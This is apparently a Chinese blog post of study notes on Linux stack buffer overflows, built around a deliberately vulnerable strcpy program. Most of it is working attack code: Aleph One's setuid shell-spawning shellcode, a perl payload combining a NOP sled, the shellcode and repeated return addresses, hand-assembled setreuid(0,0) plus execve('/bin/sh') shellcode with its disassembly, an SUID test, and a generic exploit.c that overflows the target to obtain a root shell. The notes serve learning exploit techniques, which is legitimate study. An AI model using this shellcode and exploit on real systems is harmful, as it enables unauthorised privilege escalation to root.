• linux缓冲区溢出学习

    漏洞代码:

    //meet.c
#include<stdio.h>
greeting(char *temp1,char *temp2){
  char name[400];
  strcpy(name,temp2);
  printf("Hello %s %s\n",temp1,name);
}
main(int argc,char *argv[]){
  greeting(argv[1],argv[2]);
  printf("Bye %s %s\n",argv[1],argv[2]);
}

    调试语句:

    gcc -mpreferred-stack-boundary=2 -o meet -ggdb meet.c

    gdb meet

    list

    b 6

    `perl -e 'print "A"x403'`

    aleph1的shellcode

    //shellcode.c
char shellcode[]=
  "\x31\xc0\x31\xdb\xb0\x17\xcd\x80"
  "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
  "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
  "\x80\xe8\xdc\xff\xff\xff/bin/sh";
void main(){
  int *ret;
  ret=(int *)&ret+2;
  (*ret)=(int)shellcode;
}

     获得当前esp值

    #include<stdio.h>
unsigned long get_sp(void){
  __asm__("movl %esp,%eax");
}
int main(){
  printf("Stack pointer(ESP):0x%x\n",get_sp());}

     perl -e 'print "\x31\xc0\x31\xdb\xb0\x17\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh";'>sc

    ./meet Mr `perl -e 'print "\x90"x203'``cat sc``perl -e 'print "\x88\xf5\xff\xbf"x89'`

    编写自己的shellcode

    1.编写汇编

    section .text
global _start
_start:
;setreuid(0,0)
xor eax,eax
mov al,0x46
xor ebx,ebx
xor ecx,ecx
int 0x80

;用execve执行shellcode
xor eax,eax
push eax
push 0x68732f2f
push 0x6e69622f
mov ebx,esp
push eax
push ebx
mov ecx,esp
xor edx,edx
mov al,0xb
int 0x80

     2.生成可执行文件

    nasm -f elf sc.asm

    ld -o sc sc.o

    3.提取十六进制代码

    objdump -d ./sc

    [root@localhost root]# objdump -d ./sc
 
./sc:     file format elf32-i386
 
Disassembly of section .text:
 
08048080 <_start>:
 8048080:       31 c0                   xor    %eax,%eax
 8048082:       b0 46                   mov    $0x46,%al
 8048084:       31 db                   xor    %ebx,%ebx
 8048086:       31 c9                   xor    %ecx,%ecx
 8048088:       cd 80                   int    $0x80
 804808a:       31 c0                   xor    %eax,%eax
 804808c:       50                      push   %eax
 804808d:       68 2f 2f 73 68          push   $0x68732f2f
 8048092:       68 2f 62 69 6e          push   $0x6e69622f
 8048097:       89 e3                   mov    %esp,%ebx
 8048099:       50                      push   %eax
 804809a:       53                      push   %ebx
 804809b:       89 e1                   mov    %esp,%ecx
 804809d:       31 d2                   xor    %edx,%edx
 804809f:       b0 0b                   mov    $0xb,%al
 80480a1:       cd 80                   int    $0x80

    4.放到程序里面测试shellcode

    //sc2.c
    char sc[]=
"\x31\xc0"
"\xb0\x46"
"\x31\xdb"
"\x31\xc9"
"\xcd\x80"
"\x31\xc0"
"\x50"
"\x68\x2f\x2f\x73\x68"
"\x68\x2f\x62\x69\x6e"
"\x89\xe3"
"\x50"
"\x53"
"\x89\xe1"
"\x31\xd2"
"\xb0\x0b"
"\xcd\x80";
main()
{
  void (*fp)(void);
  fp=(void *)sc;
  fp();
}

     5.设置SUID并执行

    sudo chown root sc2

    sudo chmod +s sc2

    ./sc2

    通用exploit代码

    //exploit.c
#include<stdio.h>
char shellcode[]= //setuid(0)
  "\x31\xc0\x31\xdb\xb0\x17\xcd\x80"
  "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
  "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
  "\x80\xe8\xdc\xff\xff\xff/bin/sh";

unsigned long get_sp(void){
  __asm__("movl %esp,%eax");
}
int main(int argc,char *argv[1]){
int i,offset=0;
long esp,ret,*addr_ptr;
char *buffer,*ptr;
int size=500;
esp=get_sp();
if(argc>1) size=atoi(argv[1]);
if(argc>2) offset=atoi(argv[2]);
if(argc>3) esp=strtoul(argv[3],NULL,0);
ret=esp-offset;
fprintf(stderr,"Usage:%s<buff_size><offset><esp:0xfff...>\n",argv[0]);
fprintf(stderr,"ESP:0x%x Offset:0x%x Return:0x%x\n",esp,offset,ret);
buffer=(char *)malloc(size);
ptr=buffer;
addr_ptr=(long *)ptr;
for(i=0;i<size;i+=4){
*(addr_ptr++)=ret;
}
for(i=0;i<size/2;i++){
buffer[i]='\x90';}
ptr=buffer+size/2;
for(i=0;i<strlen(shellcode);i++){
*(ptr++)=shellcode[i];
}
buffer[size-1]=0;
execl("./meet","meet","Mr.",buffer,0);
printf("%s\n",buffer);
free(buffer);
return 0;
}
  • 相关阅读:
    快速排序
    推荐!手把手教你使用Git
    「瞻前顾后」写出我心(九十九)
    「减法」写出我心(九十八)
    「焦虑」写出我心(九十七)
    「认知水平」​​​​​​​​写出我心(九十六)
    「成功的事业」写出我心(九十五)
    「爱」​​​​​​写出我心(九十四)
    「赢」​​​​​写出我心(九十三)
    「体面人」​​​​写出我心(九十二)
  • 原文地址:https://www.cnblogs.com/shanmao/p/2815490.html
Copyright © 2020-2023  润新知